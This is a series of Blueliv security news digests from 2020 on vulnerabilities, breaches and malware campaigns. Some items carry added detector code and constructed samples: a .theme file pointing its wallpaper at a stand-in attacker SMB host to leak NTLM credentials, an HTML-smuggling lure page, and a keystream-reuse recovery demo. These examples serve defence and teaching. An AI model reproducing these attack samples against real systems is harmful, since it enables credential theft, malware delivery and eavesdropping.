Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   September 10th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

BLURtooth vulnerability allows attacks on the Bluetooth key-derivation process

A security advisory explains that when Cross-Transport Key Derivation (CTKD) is used to pair dual-mode Bluetooth devices (devices that support both BR/EDR and Low Energy), pairing happens only once, over one of the two transports, and the Long Term Key / Link Key (LTK/LK) for the other transport is derived from that pairing. Those derived keys can overwrite existing ones even where the transport being overwritten enforces a higher level of security, which is what a BLUR attack takes advantage of. An attacker within Bluetooth range of a vulnerable device could spoof the identity of an already paired device, overwrite the original key with a weaker one and gain access to authenticated services. BLURtooth also enables man-in-the-middle (MitM) attacks, with the attacker sitting between two vulnerable devices that had been linked using authenticated pairing.

Threat actors stole $5.4 million from ETERBASE Slovak cryptocurrency exchange

Slovak cryptocurrency exchange ETERBASE disclosed a security breach in which attackers stole Bitcoin, Ether, ALGO, Ripple, Tezos and TRON assets worth about $5.4 million. The company disclosed the hack on Thursday: the threat actors drained various cryptocurrencies from its hot wallets, and the exchange suspended all transactions until September 10. ETERBASE notified law enforcement, which is investigating the incident, and told its users that it has enough capital to meet all of its obligations.

Zeppelin Ransomware Returns with New Trojan on Board

The Zeppelin ransomware has resurfaced after a hiatus of several months. A wave of attacks spotted in August makes use of a new trojan downloader. These attacks, like the initial Zeppelin wave observed in late 2019, start with phishing emails carrying Microsoft Word attachments (themed as "invoices") with malicious macros. Once a user enables macros, the infection chain starts. The latest campaign has affected around 64 known victims and targets, indicating a degree of targeting. It may have started on June 4, when the command-and-control server the malware uses was registered.

Blueliv Intelligence Briefing

Wednesday,   September 9th,   2020

Intel fixes critical vulnerabilities in AMT and ISM platforms

Intel addressed nine security vulnerabilities with the release of the September 2020 Platform Update, one of them a critical flaw in the Active Management Technology (AMT) and Intel Standard Manageability (ISM) platforms. The issues are detailed in five advisories published on Intel's Product Security Center; the fixes were delivered to customers through the Intel Platform Update (IPU) process before disclosure. Each advisory ends with a list of affected products, support information for vulnerable products and contact details for reporting other security issues found in Intel products or technologies.

Adobe patches critical code execution vulnerabilities in AEM, FrameMaker and InDesign

Adobe has released security updates for twelve critical vulnerabilities that could be exploited to execute arbitrary code on systems running vulnerable versions of Adobe InDesign, Adobe FrameMaker and Adobe Experience Manager (AEM). The company also addressed 18 important-severity vulnerabilities in AEM and the AEM Forms add-on package that could lead to arbitrary JavaScript execution in the browser via stored cross-site scripting, or to disclosure of sensitive information via execution with unnecessary privileges.

Microsoft September 2020 Patch Tuesday fixes 129 vulnerabilities

Microsoft has published today its monthly batch of security updates, also known as Patch Tuesday. This month Microsoft patched 129 vulnerabilities across 15 products, ranging from Windows to ASP.NET. Of those 129, 32 are classified as remote code execution issues, bugs that let attackers exploit vulnerable applications over a network; 20 of these 32 also received a severity rating of "critical", the highest on Microsoft's scale, making them the most important bugs patched across Microsoft products this month.

Hackers use legitimate cloud monitoring tools to take over Docker, Kubernetes platforms

In a recent attack, the cybercrime group TeamTNT relied on a legitimate tool to keep a grip on compromised cloud infrastructure without deploying malicious code on it. The group used an open-source tool built to monitor and control cloud environments running Docker and Kubernetes, reducing its footprint on the breached servers. According to researchers, this may be the first time a legitimate third-party tool has been abused as a backdoor in a cloud environment, and it indicates the evolution of this particular group.

Blueliv Intelligence Briefing

Tuesday,   September 8th,   2020

Windows credentials can be stolen through Windows 10 themes

This weekend a security researcher revealed that specially crafted Windows theme files can be used to harvest Windows credentials, in what the report calls a Pass-the-Hash attack. A theme can point a resource such as the desktop wallpaper at a remote SMB share that requires authentication; when Windows tries to load the resource, it automatically attempts to log in to the remote system, sending the user's login name and an NTLM response derived from the password hash. The attacker harvests these credentials and then attempts to crack the hash offline to recover the user's password. Strictly speaking, what is captured is an NTLM (Net-NTLMv2) challenge-response rather than the stored NT hash, so its value lies in offline cracking or relaying rather than a classic Pass-the-Hash replay; the exposure for the user is the same either way.
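A small detector for theme files that reference remote shares, added here as an example and not taken from the researcher's report. The two .theme samples are constructed; the keys they use (Wallpaper under [Control Panel\Desktop], ImagesRootPath under [Slideshow]) are the standard ones a theme file carries, and any other key pointing at a UNC path is flagged the same way.

```python
import configparser
import re
from typing import Dict, List

# Constructed sample .theme files (Windows theme files use INI syntax).
# The benign one references local wallpaper paths; the malicious one points
# the wallpaper and the slideshow folder at remote SMB shares, which is what
# makes Windows authenticate outbound when the theme is applied.
BENIGN_THEME = """[Theme]
DisplayName=Blue Sky

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
TileWallpaper=0

[Slideshow]
ImagesRootPath=%SystemRoot%\\web\\wallpaper\\Theme1
"""

MALICIOUS_THEME = """[Theme]
DisplayName=Free Wallpaper Pack

[Control Panel\\Desktop]
Wallpaper=\\\\203.0.113.10\\share\\wallpaper.jpg
TileWallpaper=0

[Slideshow]
ImagesRootPath=//evil.example/themes/pics
"""

# A UNC path: two leading backslashes (or forward slashes, which Windows also
# accepts) followed by a host name or address and then a share name.
UNC_RE = re.compile(r"^(?:\\\\|//)(?P<host>[^\\/]+)[\\/]")


def find_remote_references(theme_text: str) -> List[Dict[str, str]]:
    """Return every key in the theme whose value is a UNC path to a remote host."""
    # interpolation=None: %SystemRoot% must not be treated as an interpolation
    # token; strict=False tolerates duplicate keys seen in real theme files;
    # delimiters=("=",) keeps a ':' inside a value from being read as a separator.
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.optionxform = str  # keep key names as written (Wallpaper, not wallpaper)
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            match = UNC_RE.match(value.strip())
            if match:
                hits.append({
                    "section": section,
                    "key": key,
                    "host": match.group("host"),
                    "value": value.strip(),
                })
    return hits


if __name__ == "__main__":
    for name, theme in (("benign", BENIGN_THEME), ("malicious", MALICIOUS_THEME)):
        hits = find_remote_references(theme)
        print(f"{name}: {len(hits)} remote reference(s)")
        for hit in hits:
            print(f"  [{hit['section']}] {hit['key']} -> {hit['host']}")
```

A hit is a reason to block the file, not proof of malice on its own; the complementary controls are blocking outbound SMB (TCP 445) at the perimeter and the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", which stops the automatic authentication regardless of which file type triggers it.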

Data breach at webmaster forum Digital Point exposes over 800k users

On July 1, researchers uncovered an unsecured Elasticsearch database containing over 62 million records; in total, data belonging to 863,412 Digital Point users was included in the leak. According to the researchers, names, email addresses and internal user ID numbers were publicly accessible, alongside internal records and user post details. While examining the database to find out who the owner was, the researchers also stumbled across data on forum members who had flagged posts and the reasons behind those reports, including allegations of "bad business dealings", spam and other reasons, some described as appearing to be "petty and personal".

Blueliv Intelligence Briefing

Monday,   September 7th,   2020

Visa alert: Baka credit card JavaScript skimmer

Baka is a sophisticated e-skimmer, developed by a skilled malware author, that implements a unique obfuscation method and loader. The loader works by dynamically adding a script tag to the current page that loads a remote JavaScript file. The JavaScript URL is hardcoded in the loader script in encrypted form, and experts observed that the attackers can change the URL for each victim. The e-skimmer payload decrypts to JavaScript written to resemble code used to render pages dynamically. The final payload and the loader use the same encryption method; once executed, the skimmer steals payment card data from the checkout form.

Blueliv Intelligence Briefing

Thursday,   August 27th,   2020

New Zealand Stock Exchange halts operations for a third day after DDoS attack

The New Zealand Stock Exchange has suspended all operations for a third day after a DDoS attack, until the attacks end or the connectivity problems can be mitigated. The extortion group behind it uses names like Armada Collective and Fancy Bear, both borrowed from better-known hacker groups, to email companies and threaten DDoS attacks that can cripple operations and incur large downtime and financial costs unless the victims pay a large ransom demand in Bitcoin.

Microsoft Azure Sphere vulnerabilities fixed

The first of two issues resides in the Normal World application READ_IMPLIES_EXEC personality and can be exploited through specially crafted shellcode that causes a process's heap to become executable. The vulnerability affects version 20.07 of Azure Sphere. The second issue was found in /proc/thread-self/mem and can be exploited via specially crafted shellcode designed to write to a process's non-writable memory; an attacker could supply shellcode designed to modify the program and trigger the vulnerability.

North Korean threat actors BeagleBoyz target banks worldwide

The campaign, dubbed "FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks", is an international operation designed to initiate fraudulent international money orders and ATM cash-outs. North Korean operatives seek unauthorized access to the networks, point-of-sale systems and ATMs of their victims. According to the advisory, the BeagleBoyz have attempted to steal at least $2 billion since 2015 and have frequently left banking systems damaged or inoperative in their wake.

Twitter pro-Chinese propaganda botnet quotes Bram Stoker's Dracula

A research group said today it identified a Twitter botnet of around 3,000 accounts that pushed pro-Chinese political spam, echoing official messaging released through state propaganda accounts. The researchers were able to identify the botnet thanks to a quirk shared by the vast majority of the accounts: most used quotes from Bram Stoker's novel Dracula as their profile description and as their first two tweets. The Dracula botnet, as they named this cluster of fake accounts, exhibited multiple similarities to past Twitter botnets that were part of Spamouflage.

Blueliv Intelligence Briefing

Monday,   August 24th,   2020

Vulnerabilities in Diebold and NCR ATMs fixed

The flaws could have allowed crooks to modify the amount of money deposited to their card (so-called deposit forgery) and then make fraudulent cash withdrawals against the inflated balance. Once the balance is modified, the criminals quickly attempt cash withdrawals before the bank detects the anomalous increase. The two bugs, tracked as CVE-2020-9062 and CVE-2020-10124, affect respectively Diebold Nixdorf ProCash 2100xe USB ATMs running Wincor Probase software and NCR SelfServ ATMs running APTRA XFS software.

Google Drive vulnerability could allow malware installation

The issue resides in Google Drive's "manage versions" feature, which allows users to upload and manage different versions of a file, and in the interface that delivers a new version of a file to other users. The feature was designed to let users replace an older version of a file with a new one carrying the same file extension, but the researchers found that it actually accepts a new version with any file extension for any file stored on Google Drive, so a malicious executable can be uploaded in place of a benign document.

Blueliv Intelligence Briefing

Friday,   August 21st,   2020

Gmail flaw allowing email spoofing fixed

The issue was caused by "missing verification when configuring mail routes", as the researcher described it. To exploit the flaw and send spoofed emails that would pass both SPF and DMARC checks, attackers would abuse a broken-recipient issue in Google's mail validation rules and use an inbound email gateway to resend the message from Google's backend, so that downstream mail servers would automatically trust it.

Jenkins critical vulnerability causing data exposure fixed

The flaw has a CVSS score of 9.4 and affects Eclipse Jetty versions 9.4.27.v20200227 to 9.4.29.v20200521; Jetty is the Java HTTP server and servlet container used by Jenkins and many other software frameworks. The vulnerability could allow unauthenticated attackers to obtain HTTP response headers that may contain sensitive data intended for another user.

IBM discloses patched vulnerability affecting IoT devices

On Wednesday, IBM revealed the vulnerability, CVE-2020-15858, which it found last September in Thales' Cinterion EHS8 M2M modules. The flaw is also present in related products, including the BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81 and PLS62 modules. "This vulnerability could enable attackers to compromise millions of devices and access the networks or VPNs supporting those devices by pivoting onto the provider's backend network," the researchers write. "In turn, intellectual property, credentials, passwords and encryption keys could all be readily available to an attacker."

Blueliv Intelligence Briefing

Thursday,   August 20th,   2020

Windows remote access vulnerabilities fixed

For the vulnerabilities to be exploited, attackers would first need code execution on the victim's device in order to run a specially crafted application. KB4578013 addresses the vulnerabilities by correcting how Windows Remote Access handles memory and file operations. Customers running Windows 8.1 or Windows Server 2012 R2 should install the update as soon as possible to be protected from attacks that could exploit these vulnerabilities.

Experian South Africa data breach impacts 24M customers

While Experian did not disclose the number of impacted users, a report from the South African Banking Risk Information Centre (SABRIC), an anti-fraud and banking non-profit, claimed the breach impacted 24 million South Africans and 793,749 local businesses. Experian said it reported the incident to local authorities, which were able to track down the individual behind it. Experian then obtained a court order "which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted". Experian said that none of the data was used for fraudulent purposes before being deleted and that the fraudster did not compromise its infrastructure, systems or customer database.

Blueliv Intelligence Briefing

Wednesday,   August 19th,   2020

Microsoft is removing insecure Cloud App Security cipher suites

Microsoft today announced that some insecure cipher suites currently supported by Microsoft Cloud App Security (MCAS) will be removed later this year. After that happens, Microsoft will no longer support connections using these cipher suites and they will stop working. To prepare for the change, "[c]ustomers should ensure that all client-server and browser-server combinations are using supported suites in order to maintain the connection to Microsoft Cloud App Security".

New Attack Alert: Duri

Duri leverages HTML smuggling to deliver malicious files to users' endpoints, evading network security controls such as sandboxes and legacy proxies: the payload is assembled in the browser by JavaScript and written to disk from there, so no file download ever crosses the wire for the proxy to inspect. The researchers who reported it note that browser isolation prevents the attack from reaching the endpoint. According to their observations, the Duri campaign started at the beginning of July and is currently active.
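A detector for the in-browser assembly pattern described above, added here as an example; it is not the researchers' detection logic and not Duri's own code. The lure page is constructed: a ZIP is built in memory and base64-encoded into the script so that the decode step has real bytes to identify. The indicator names and thresholds (a base64 literal of at least 200 characters) are this example's choices.

```python
import base64
import io
import re
import zipfile
from typing import Any, Dict

# Indicators of a page that builds a file in the browser and pushes it to disk.
INDICATORS = {
    "blob_constructor": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "legacy_save_blob": re.compile(r"msSaveOrOpenBlob|msSaveBlob"),
    "base64_decode": re.compile(r"\batob\s*\("),
    "download_attribute": re.compile(r"\bdownload\s*=\s*['\"]([^'\"]+)['\"]"),
}
# A long base64 string literal: the smuggled payload itself.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{200,}={0,2})['\"]")

MAGIC = (
    (b"PK\x03\x04", "zip/jar/office"),
    (b"MZ", "pe executable"),
    (b"\x7fELF", "elf executable"),
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0", "ole (doc/xls/msi)"),
)


def identify(blob: bytes) -> str:
    for magic, label in MAGIC:
        if blob.startswith(magic):
            return label
    return "unknown"


def analyze_html(html: str) -> Dict[str, Any]:
    """Flag HTML-smuggling indicators and decode any embedded base64 payload."""
    found = [name for name, rx in INDICATORS.items() if rx.search(html)]
    dl = INDICATORS["download_attribute"].search(html)
    payloads = []
    for literal in B64_LITERAL.findall(html):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:
            continue  # not base64 after all
        info: Dict[str, Any] = {"size": len(raw), "type": identify(raw)}
        if info["type"].startswith("zip"):
            try:
                with zipfile.ZipFile(io.BytesIO(raw)) as archive:
                    info["members"] = archive.namelist()
            except zipfile.BadZipFile:
                info["members"] = []
        payloads.append(info)
    return {"indicators": found, "download_name": dl.group(1) if dl else None, "payloads": payloads}


def is_likely_smuggling(report: Dict[str, Any]) -> bool:
    """Payload built in-page plus a client-side save path is the smuggling signature."""
    ind = set(report["indicators"])
    return "blob_constructor" in ind and bool(ind & {"object_url", "legacy_save_blob"}) and bool(report["payloads"])


def build_sample_page() -> str:
    """Constructed lure page: a ZIP dropper encoded into the script, decoded and saved client-side."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("invoice.js", "// stand-in for a JavaScript dropper\n" + "x" * 300)
    payload = base64.b64encode(buf.getvalue()).decode()
    template = """<html><body><p>Your invoice is being prepared...</p>
<script>
var data = "__PAYLOAD__";
var bin = atob(data);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
</script></body></html>"""
    return template.replace("__PAYLOAD__", payload)


# A plain download link: the download attribute alone is not smuggling.
BENIGN_PAGE = '<html><body><a href="/reports/q3.pdf" download="q3.pdf">Download report</a></body></html>'


if __name__ == "__main__":
    for label, page in (("lure", build_sample_page()), ("benign", BENIGN_PAGE)):
        report = analyze_html(page)
        print(label, is_likely_smuggling(report), report["download_name"], report["payloads"])
```

Because the file is reconstructed client-side, the place to run a check like this is wherever the HTML itself is still visible: a mail gateway, a proxy that inspects page bodies, or the browser. Payloads split across several string literals or decoded from something other than base64 will slip past the literal regex, so treat the indicator combination, not the decoded payload, as the primary signal.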

Blueliv Intelligence Briefing

Tuesday,   August 18th,   2020

Cryptomining bot TeamTNT steals AWS credentials

The group accesses exposed Docker APIs and deploys containers inside the Docker installation to run DDoS and crypto-mining malware. According to researchers, the TeamTNT botnet is now also targeting misconfigured Kubernetes installations. The operators have added a new feature that scans the infected servers for Amazon Web Services (AWS) credentials. The TeamTNT bot borrows code from another worm, tracked as Kinsing, which was spotted in April targeting Docker clusters to deploy crypto-miners.

Microsoft fixes zero-day flaw reported two years ago

The vulnerability is tracked as CVE-2020-1464 and is described by Microsoft as a spoofing vulnerability in how Windows validates file signatures. Security researchers later noted in a blog post that the update is for a bug reported two years earlier, on August 18th, 2018, which Microsoft originally stated it would not fix. With the patch for CVE-2020-1464, Windows no longer considers an MSI file validly signed if it has been tampered with by appending a JAR file to it.
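A structural check for the MSI-with-appended-JAR pattern this patch addresses, added here as an example; it is not Microsoft's validation logic. The "MSI" is a constructed OLE header stub (enough for the check, not a valid installer) and the JAR is built in memory. The check is a heuristic: a file that an OLE parser accepts from the front and a ZIP parser accepts from the back is exactly the polyglot that let the Java loader run content Authenticode never covered.

```python
import io
import zipfile
from typing import List

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # Compound File Binary header; MSI files start with it
ZIP_EOCD = b"PK\x05\x06"                        # ZIP end-of-central-directory signature
EOCD_SEARCH_WINDOW = 22 + 0xFFFF                # fixed EOCD size plus the maximum comment length


def looks_like_msi(data: bytes) -> bool:
    return data.startswith(OLE_MAGIC)


def zip_eocd_offset(data: bytes) -> int:
    """Offset of a ZIP end-of-central-directory record in the file tail, or -1."""
    return data.rfind(ZIP_EOCD, max(0, len(data) - EOCD_SEARCH_WINDOW))


def is_msi_jar_polyglot(data: bytes) -> bool:
    """OLE/MSI header at the front and a ZIP EOCD at the back: two parsers, two views of one file."""
    return looks_like_msi(data) and zip_eocd_offset(data) != -1


def appended_archive_members(data: bytes) -> List[str]:
    """List the members of the ZIP/JAR glued onto the end of the file.

    zipfile locates the archive from the EOCD record and tolerates the leading
    non-ZIP bytes, which is the same behaviour that makes the Java loader happy
    with such a file while the signature check only looks at the OLE structure.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return archive.namelist()


# Constructed sample: an OLE header followed by one sector of padding.
FAKE_MSI = OLE_MAGIC + b"\x00" * 504


def build_polyglot() -> bytes:
    """FAKE_MSI with a small constructed JAR appended."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Payload\n")
        jar.writestr("Payload.class", b"\xca\xfe\xba\xbe" + b"\x00" * 32)  # class-file magic plus filler
    return FAKE_MSI + buf.getvalue()


if __name__ == "__main__":
    sample = build_polyglot()
    print("clean MSI flagged:", is_msi_jar_polyglot(FAKE_MSI))
    print("polyglot flagged :", is_msi_jar_polyglot(sample))
    print("appended members :", appended_archive_members(sample))
```

Run this over downloads of Authenticode-signed installers before trusting the signature verdict alone; a legitimate MSI has no reason to end in a ZIP end-of-central-directory record.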

Notepad++ text editor banned in China

"I reject the idea that our given free speech rights are restrained by an authoritarian country. Notepad++ stands with the people of Hong Kong," the Stand with Hong Kong blog post stated. When trying to download the Notepad++ program using China-based web browsers, downloaders are greeted with interstitial messages saying the site has been blocked. "I am not surprised about their reaction. But since the free speech is basic right of everyone, I won't keep silent," creator of the software said. Learn more >

Blueliv Intelligence Briefing

Monday,   August 17th,   2020

Canadian govt accounts hijacked to steal COVID-19 funds

A statement from the Treasury Board of Canada Secretariat on Saturday revealed that the attackers had used tried-and-tested credential stuffing techniques to hijack GCKey and Canada Revenue Agency (CRA) accounts. The government said that 9,041 users were affected by the campaign, and that in a third of cases services were accessed illegally. Around 5,500 CRA accounts were targeted by this and a separate credential stuffing attack on the tax office, it added. Affected GCKey accounts were cancelled as soon as the threat was discovered, and departments are contacting users whose credentials were revoked to provide instructions on how to obtain a new GCKey.

Blueliv Intelligence Briefing

Thursday,   August 13th,   2020

Vulnerability in 4G Voice over LTE (VoLTE) protocol used to eavesdrop on voice calls

For each call, the mobile network must derive an encryption key that, fed to the stream cipher, produces the keystream protecting the call; the key, and therefore the keystream, should be unique to each call. A team of academics from Ruhr University Bochum, Germany, discovered that not all mobile operators follow the 4G standard to the letter. While operators do support encrypted voice calls, many calls are encrypted with the same key. The researchers said the problem usually manifests at the base station (cell tower) level, where in many cases the same keystream is reused, or the key for a call is generated in a predictable way. Keystream reuse is fatal for any stream cipher: XORing two ciphertexts encrypted under the same keystream cancels the keystream and leaves the XOR of the two plaintexts, so an attacker who records the victim's call and then places a call of their own through the same cell, whose content they know, can recover the victim's audio.
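The keystream reuse described above, worked through as an added example (not code from the researchers or from the page). A toy keystream generator stands in for the LTE stream cipher, the two call transcripts and the reused key are constructed, and the recovery is the standard two-time-pad attack; the example also shows that recovery is limited to the overlap between the two calls, which is why the attacker's call has to last at least as long as the victim's.

```python
import hashlib
import os


def keystream(key: bytes, length: int) -> bytes:
    """Toy keystream generator standing in for the LTE stream cipher.

    It is deterministic in the key so that reuse is observable; it is a
    stand-in for this example only, not a real cipher.
    """
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_call(key: bytes, audio: bytes) -> bytes:
    """Stream-cipher encryption: ciphertext = plaintext XOR keystream(key)."""
    return xor(audio, keystream(key, len(audio)))


def recover_target_call(ct_target: bytes, ct_known: bytes, pt_known: bytes) -> bytes:
    """Recover the target call from a second call encrypted under the same keystream.

    With a shared keystream ks:
        ct_target ^ ct_known = (pt_target ^ ks) ^ (pt_known ^ ks) = pt_target ^ pt_known
    so  pt_target = ct_target ^ ct_known ^ pt_known.
    Only the overlapping prefix can be recovered.
    """
    n = min(len(ct_target), len(ct_known), len(pt_known))
    return xor(xor(ct_target[:n], ct_known[:n]), pt_known[:n])


# Constructed stand-ins for the decoded audio of two calls on the same cell.
VICTIM_CALL = b"Transfer the funds to account 4711 before noon."
ATTACKER_CALL = b"Hello, this is a test call, please keep talking for a while, thank you."
REUSED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed key


def demo_key_reuse() -> bytes:
    """Base station reuses the key for consecutive calls: the victim's call is fully recovered."""
    ct_victim = encrypt_call(REUSED_KEY, VICTIM_CALL)      # sniffed over the air
    ct_attacker = encrypt_call(REUSED_KEY, ATTACKER_CALL)  # attacker's own call, also sniffed
    return recover_target_call(ct_victim, ct_attacker, ATTACKER_CALL)


def demo_fresh_keys() -> bytes:
    """Compliant base station derives a fresh key per call: the same computation yields noise."""
    ct_victim = encrypt_call(os.urandom(16), VICTIM_CALL)
    ct_attacker = encrypt_call(os.urandom(16), ATTACKER_CALL)
    return recover_target_call(ct_victim, ct_attacker, ATTACKER_CALL)


if __name__ == "__main__":
    print("key reused :", demo_key_reuse())
    print("fresh keys :", demo_fresh_keys()[:16], "...")
```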

Coronavirus ventilator manufacturer Boyce Technologies targeted by ransomware

The cybercriminals have threatened to disclose more information next week through their leak site if an undisclosed cryptocurrency ransom is not paid by the firm. Boyce Technologies is well known for designing and manufacturing FDA-approved low-cost ventilators in just 30 days during the first months of the COVID-19 pandemic, amid the high demand for the machines across New York hospitals. Prior to the attack the company was making 300 units a day with the help of robots it built itself.

Alexa voice assistant exploitable to hand over user data

Users can extend Alexa's capabilities by installing "skills", additional functionality developed by third-party vendors that can be thought of as apps, such as weather programs and audio features. The smart assistant, found in devices such as the Amazon Echo and Echo Dot, with over 200 million shipments worldwide, was found to be vulnerable to attackers seeking user personally identifiable information (PII) and voice recordings, because some of its subdomains were susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks.

Blueliv Intelligence Briefing

Wednesday,   August 12th,   2020

Google Chrome bug would let hackers bypass CSP protection

Tracked as CVE-2020-6519 (rated 6.5 on the CVSS scale), the issue is a Content Security Policy (CSP) bypass that lets injected script run on sites that rely on CSP to block it; since CSP is a second line of defence, the bypass matters wherever an attacker already has an injection point, such as an XSS bug. Some of the most popular websites, including Facebook, Wells Fargo, Zoom, Gmail, WhatsApp, Investopedia, ESPN, Roblox, Indeed, TikTok, Instagram, Blogger and Quora, were susceptible. Interestingly, the same flaw appears to have been highlighted by Tencent Security Xuanwu Lab more than a year earlier, a month after the release of Chrome 73 in March 2019, but was not addressed until PerimeterX reported it this March.

Adobe Acrobat and Reader affected by critical flaws

Patches are available for Acrobat DC, Acrobat Reader DC, Acrobat 2020 and Acrobat Reader 2020 (Classic track), Acrobat/Reader 2017 and Acrobat/Reader 2015 on Windows and macOS. The important-severity vulnerabilities range from sensitive data exposure and security bypass to stack exhaustion and out-of-bounds read problems.

Blueliv Intelligence Briefing

Tuesday,   August 11th,   2020

Threat actors hijack Tor exit nodes to perform SSL stripping attacks

According to a report published on Sunday, the group managed 380 malicious Tor exit relays at its peak, before the Tor team made the first of three interventions to cull the network. The primary goal of the SSL stripping attacks was to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services. SSL stripping only works against connections that begin as plain HTTP, which is why HSTS and HTTPS-only defaults blunt it; an exit relay cannot downgrade a connection the client insists on making over TLS.

Agent Tesla | Old RAT Uses New Tricks to Stay on Top

The new variants of the Agent Tesla RAT come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, and FTP and email clients. The malware is currently very popular with business email compromise (BEC) scammers, who use it to record keystrokes and take screenshots on compromised machines.

New zero-day RCE vBulletin bug patched

The zero-day is a bypass of the patch for a previous vBulletin zero-day, CVE-2019-16759, disclosed in September 2019. That earlier flaw allowed attackers to exploit a bug in the vBulletin template system to run malicious code and take over forums without authenticating to the victim site (a pre-auth RCE). A researcher has now found a simple way to bypass the patch and continue to exploit the same CVE-2019-16759 vulnerability.

Blueliv Intelligence Briefing

Friday,   August 7th,   2020

KrØØk vulnerability variant can impact Qualcomm and MediaTek Wi-Fi chips

Although researchers initially said that only devices with Broadcom and Cypress Wi-Fi chips were affected, new KrØØk variants have been found to also affect Qualcomm and MediaTek radios used in vehicles, navigation systems, watches, laptops, smartphones, routers and other devices. These findings greatly increase the number of devices exposed to KrØØk attacks and their variants if left unpatched.

Unpatched vulnerability in Windows Print Spooler

The flaw CVE-2020-1048 affects Windows Print Spooler, the service that manages the printing process. A bypass of its patch has been classified as a new vulnerability and tracked as CVE-2020-1337; a fix will become available on August 11.

Inter skimming kit used in homoglyph attacks

The technique consists of using characters that look alike in order to dupe users. Sometimes the characters come from a different script, and sometimes the trick is as simple as a capital "I" standing in for a lower-case "l". A threat actor with ties to the Magecart group is using this technique on several domain names to load the popular Inter skimming kit from inside a favicon file.
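A look-alike domain check of the kind that catches these hosts, added here as an example and not taken from the report on this campaign. The confusables table is a small subset of the Unicode confusables data (the Cyrillic letters that render like Latin ones, plus the digit and I/l substitutions), the watch list of brand names is constructed, and the pair mappings (rn for m, vv for w) are this example's choice; a production check would load the full confusables list.

```python
import unicodedata
from typing import Dict, Optional

# Single characters that render like a Latin letter (subset of Unicode confusables).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",   # Cyrillic с х у і
    "\u0458": "j", "\u0455": "s", "\u04bb": "h", "\u04cf": "l",   # Cyrillic ј ѕ һ ӏ
    "\u0501": "d", "\u051b": "q", "\u051d": "w",                  # Cyrillic ԁ ԛ ԝ
    "\u0131": "i", "\u0261": "g",                                 # dotless i, script g
    "0": "o", "1": "l", "I": "l", "|": "l",
}
# Character pairs that read as one Latin letter at normal font sizes.
PAIR_CONFUSABLES = {"rn": "m", "vv": "w"}

PROTECTED_BRANDS = ["paypal", "microsoft", "blueliv"]  # constructed watch list


def _map_chars(s: str) -> str:
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)


def skeleton(label: str) -> str:
    """Reduce a label to what a human sees: fold look-alike characters to Latin."""
    s = unicodedata.normalize("NFKC", label)
    s = _map_chars(s)            # catches capital I before lower() turns it into i
    s = _map_chars(s.lower())    # catches upper-case Cyrillic after case folding
    for pair, single in PAIR_CONFUSABLES.items():
        s = s.replace(pair, single)
    return s


def scripts_used(label: str) -> set:
    """Unicode script names (LATIN, CYRILLIC, ...) of the letters in the label."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def registrable_label(domain: str) -> str:
    """Second-level label, decoded from punycode when the domain is an IDN."""
    if any(part.startswith("xn--") for part in domain.split(".")):
        domain = domain.encode("ascii").decode("idna")
    parts = domain.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def check_domain(domain: str, brands=PROTECTED_BRANDS) -> Dict[str, Optional[str]]:
    label = registrable_label(domain)
    sk = skeleton(label)
    impersonates = None
    for brand in brands:
        if sk == skeleton(brand) and label.lower() != brand:
            impersonates = brand
            break
    return {
        "domain": domain,
        "label": label,
        "skeleton": sk,
        "mixed_script": len(scripts_used(label)) > 1,
        "impersonates": impersonates,
    }


if __name__ == "__main__":
    samples = ["\u0440\u0430\u0443\u0440\u0430l.com",  # Cyrillic р а у р а + Latin l
               "rnicrosoft.com", "paypa1.com", "PayPaI.com", "paypal.com", "example.com"]
    samples.append(samples[0].encode("idna").decode("ascii"))  # same domain in punycode form
    for d in samples:
        print(check_domain(d))
```

Skeleton matching works on both sides (the brand is folded too), so expect occasional false positives on legitimate names that contain "rn" or a digit; mixed-script labels are the stronger signal and are worth a block on their own in most organisations.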

Blueliv Intelligence Briefing

Thursday,   August 6th,   2020

Firefox evil cursor bug fixed

